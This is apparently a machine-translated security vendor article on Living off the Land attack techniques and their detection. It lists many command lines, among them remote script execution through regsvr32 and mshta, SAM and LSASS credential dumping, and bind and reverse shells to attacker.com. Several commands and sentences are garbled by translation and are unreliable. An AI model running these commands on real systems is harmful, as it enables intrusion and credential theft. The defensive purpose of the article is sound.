The Living off the Land Family: how to detect and mitigate

Alexey Balandin, Security Vision

This article is devoted to a review of a whole class of attack methods and techniques aimed at masking their activity and bypassing existing protection and detection mechanisms. This class of attack techniques is quite old and is called Living Off the Land; it has been actively used by attackers over the past few decades - now almost no APT attack can be accomplished without using these techniques. They have gained enormous popularity among attackers primarily due to the fact that by their nature they allow them to remain below the SOC radar. These techniques involve using existing OS mechanisms and trusted, unsuspicious tools for covert code execution, horizontal movement, remote monitoring, data collection, privilege escalation, etc. The article will also discuss ways to detect and counter this class of attack techniques.

The Living Off the Land family has grown so much in recent years that a separate LOLOL (Living Off the Living Off the Land) project has been created to describe all available subclasses of attack techniques. Next, let's look at the most popular and relevant, in our opinion, subclasses: LOLBAS, GTFOBins BYOVD, RMM.

LOLBAS

This category includes executable files/scripts/libraries that are signed by Microsoft or another reputable vendor or are native to Windows, as well as have functionality that can be abused. Such functionality can include:

 ·  File Execution

1) pcalua.exe -a file.exe
2) rundll32.exe \\servername\C$\Windows\Temp\file.dll,EntryPoint
3) rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://www.example.org/file.ext")
4) regsvr32.exe /s /n /u /i:https://www.example.org/file.sct scrobj.dll
5) mshta.exe file.hta
6) mshta.exe javascript:a=GetObject("script:https://www.example.org/file.sct").Exec();close();
7) InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
8) regasm.exe file.dll
9) regsvcs.exe file.dll
10) wmic.exe process call create "cmd /c c:\windows\system32\calc.exe"

 ·  Code compilation

1) csc.exe -out:file.exe file.cs
2) ilasm.exe C:\Windows\Temp\file.txt /exe
3) jsc.exe /t:library file.js
4) vbc.exe /target:exe C:\Windows\Temp\file.vb

 ·  File operations (uploading, uploading, copying files)

1) bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
2) certoc.exe -GetCACAPS https://www.example.org/file.ps1
3) type \\servername\C$\Windows\Temp\file.ext > C:\Windows\Temp\file.ext
4) cmdl32 /vpn /lan %cd%\config
5) DataSvcUtil /out:C:\Windows\Temp\file.ext /uri:https://www.example.org/file.ext
6) finger user@example.host.com | more +2 | cmd
7) makecab \\servername\C$\Windows\Temp\file.exe C:\Windows\Temp\file.cab

 ·  Adding to auto-upload

1) pnputil.exe -i -a C:\Windows\Temp\file.inf
2) Update.exe --createShortcut=file.exe -l=Startup

 ·  Bypassing UAC

1) ComputerDefaults.exe
2) eventvwr.exe

 ·  Compromise of credentials

1) cmdkey /list
2) reg save HKLM\SECURITY C:\Windows\Temp\file.1.bak && reg save HKLM\SYSTEM C:\Windows\Temp\file.2.bak && reg save HKLM\SAM C:\Windows\Temp\file.3.bak
3) findstr /S /I cpassword \\sysvol\policies\*.xml

 ·  Removing a process memory dump

1) rdrleakdiag.exe /p 832 /o C:\Windows\Temp\folder /fullmemdmp /wait 1
2) TTTracer.exe -dumpFull -attach 1234
3) rundll32 C:\windows\system32\comsvcs.dll MiniDump {LSASS_PID} dump.bin full

 ·  Bypassing application whitelisting

1) bginfo.exe file.bgi /popup /nolicprompt
2) regsvcs.exe file.dll
3) cmstp.exe /ni /s https://www.example.org/file.inf
4) InstallUtil.exe /logfile= /LogToConsole=false /U file.dll
5) msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\Windows\Temp\file.xml /skip TRUE
6) regasm.exe file.dll
7) regsvr32.exe /s /u /i:file.sct scrobj.dll
8) InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
9) msbuild.exe Msbuild.csproj
10) mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();
11) Presentationhost.exe file:///IPAddressOrDomainName/Evil.xbap

In this paragraph, special attention should be paid to the tools regasm.exe , regsvr32.exe , InstallUtil.exe , msbuild.exe , mshta.exe , Presentationhost.exe because they can be used to bypass AppLocker with default rules, which is quite common in corporate networks.

list of bypasses of AppLocker default rules

 ·  The DLL sideloading / hijacking attack technique also belongs to the LOLBAS category, is difficult to detect and is widely used in APT attacks to bypass antiviruses/ EDR, application whitelisting. One of the most destructive uses of this technique was the REvil cryptographer's attack on MSP Kaseya in 2021, when a trusted Windows Defender executable file was used to download and execute the malicious library. MsMpEng.exe

GTFOBins

This category includes trusted, native executable files in Unix, which provide opportunities for abuse of the following functionality:

 ·  Launching an interactive command shell

1) busybox sh
2) find it . -exec /bin/sh\; -complete
3) gcc shell /bin/sh,-s
4) nmap –interactive
nmap> !sh
5) perl -e 'exec "/bin/sh";'
6) export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'
7) python -c 'importing the operating system; os.system("/bin/sh")'

 ·  Bind the shell

1) nc -l -p 12345 -e /bin/sh
2) socat TCP LISTENS TO:12345, reuses addr, performs fork:/bin/sh,pty,stderr,setsid,sigint,sane
3) socket -svp '/bin/sh -i' 12345

 ·  Reverse shell

1) Export RHOST=attacker.com
export RPORT=12345
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
2) Export RHOST=attacker.com
export RPORT=12345
perl -e'uses a socket;$i="$ENV{RHOST}" $p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");execute("/bin/sh -i");};'
3) Export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
4) Export RHOST=attacker.com
export RPORT=12345
python -c 'imports sys,socket,os,pty;s=socket.socket()
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
5) Export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'shuts down when forking;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r") _BOS_|io|c.print io.read}end'

BYOVD

This category of attacks includes techniques aimed at exploiting driver vulnerabilities. Due to the fact that drivers run at the lowest and most privileged OS level (ring 0), they have direct access to the processor, memory, I/O devices, etc. As a result, executing code at this level can have extremely devastating consequences, from privilege escalation and compromising authentication data to disabling OS security features and hiding malicious activity.

In practice, vulnerable drivers are often used to disable and deactivate SPI, which themselves function at the OS kernel level and have self-protection functionality (antiviruses, EPD), as a result of which they cannot be deactivated at the ring 3 level (user mode). This is achieved by terminating the SPI processes, removing the installed callback functions at the kernel level (notification core), closing the handles process, disabling the PPL mechanism (secure lightweight process), deactivating the driver signature verification mechanism, etc. The problem also lies in the fact that there are quite a lot of legitimate tools used to diagnose OS problems and investigate incidents involving vulnerable drivers, the functionality of which can be used for malicious purposes. An example of this is such popular tools as Process Explorer, Process Hacker, Gmer. At the moment, there are more than 700 experienced lawyers who regularly participate in the project among drivers living abroad (LOLDrivers). A prerequisite for the implementation of this technique (installing a vulnerable driver) is the availability of administrator rights and bypassing UAC, which, however, does not reduce its popularity, including among encryption viruses (RobbinHood ransomware campaign, BlackByte ransomware campaign, The criminals signed their AV-killer malware, closely related to one known as BURNTCIGAR, multiple incidents involving AuKill).

BYOVD's popularity has been and remains so high that ready-made toolkits for deactivating the most famous EDRS can be purchased on the black market. An example of this is Terminator, which is sold by intruders for $ 3,000.

RMM

After gaining initial access and securing on compromised nodes, it is important for an attacker to ensure remote control, while remaining unnoticed for as long as possible. Remote Monitoring and Management utilities are widely used to solve this problem, most of which are legitimate software and have the vendor's signature. The simplicity and convenience of these utilities makes them popular among system administrators, which plays into the hands of attackers, allowing them to stay below the SOC radar for a long time. The most commonly used are PsExec, Ammy Admin, AnyDesk, TeamViewer, DameWare

Detection and prevention

1. Regular replenishment and updating of the database of correlation rules of its SIEM based on expertise taken from Sigma rules, Elastic security, Mitre CAR projects, as well as from TI reports of research groups
https://thedfirreport.com/
https://www.welivesecurity.com/
https://research.checkpoint.com/
https://unit42.paloaltonetworks.com/
https://www.group-ib.com/blog/
https://bi.zone/expertise/blog/
https://securelist.ru/

When developing correlation rules for our SIEM/EDR, we at Security Vision actively use the expertise from the sources presented above.

2. Using EDR class solutions, as well as free solutions – Sysmon, Wazuh Osquery, Velociraptor.

It is recommended to use Sysmon-modular as the configuration for Sysmon.

3. The use of UEBA class solutions that allow to identify anomalies and deviations from the formed profile of the reference behavior of the user and the network node. We use this approach in our Security Vision UEBA product, it has proven itself well in practice and allows us to identify activities that are difficult to cover with the SIEM correlation rules due to the large number of false positives (for example, running powershell on an accountant's ARM or accessing github from a lawyer's ARM).

4. Using the principle of minimum privileges. Do not grant users local administrator/root rights on the ARM, unless this is required as part of the employee's official duties.

5. To detect and prevent BYOVD, use sysmon with a configuration aimed at blocking the creation of vulnerable drivers by file hash.

6. When hunting LOLBAS traces on end nodes, the so–called Evidence of Execution (Prefetch logs, AmCache, AppCompatCache, ShimCache, etc.), as well as Windows security log events – Eventid 4688 (Process Creation), Eventid 5156, 5158 (Windows Firewall), Sysmon log - Eventid act as host indicators. 1 (Process Creation). A useful network indicator is the User-Agent – “Microsoft-CryptoAPI" (certutil.exe ), "Microsoft BITS" (bitsadmin.exe ).

7. When detecting LOLBAS activity at the network level, in addition to the User Agent mentioned above, it is important to pay attention to the network telemetry of protocols such as LDAP, RPC, SMB, and WMI. NTA class solutions or Malcolm/Zeek free solutions do a good job with this task (we wrote about their use in incident investigation in the article).

8. If possible, it is necessary to block LOLBAS utilities using AppLocker, WDAC, or other Application Whitelisting solutions if their use is not required as part of the execution of workflows. The link below provides a complete list of LOLBAS utilities recommended by Microsoft for blocking.

9. Use SELinux, AppArmor to block the launch of GTFOBins utilities on Linux nodes.

10. LOLBAS also includes powershell, as well as its numerous cmdlets and modules (including the Active Directory module often used by attackers) aimed at collecting network/domain data, executing code, moving horizontally, etc. To detect this activity, you must enable Powershell logging: module logging (Eventid 4103), script block logging (Eventid 4104), transcription logging. It is also recommended to activate Constrained Language Mode to prevent unsafe powershell cmdlets and scripts from running.

11. When investigating incidents involving DLL sideloading / hijacking, which are among the most difficult to detect in the LOLBAS class, indicators of these techniques can be detected using specialized scanners DLLHound, Crassus.

12. Good results in detecting LOL technique indicators, as well as building an attack timeline, on a single node using Sigma rules (especially in the absence of indicators on the SIEM side or a large number of false developments) can be shown by the scanners Chainsaw, Zircolite, Hayabusa.

Conclusion

Due to its effectiveness and simplicity, Living Off the Land techniques will remain popular with attackers for a long time to come. To detect and counter them, it is necessary, on the one hand, to regularly replenish the knowledge base on new methods of attacks in order to detect them in a timely manner, on the other hand, to observe the principle of minimum privileges on users' ARM and, if possible, block LOL tools using Application Whitelisting.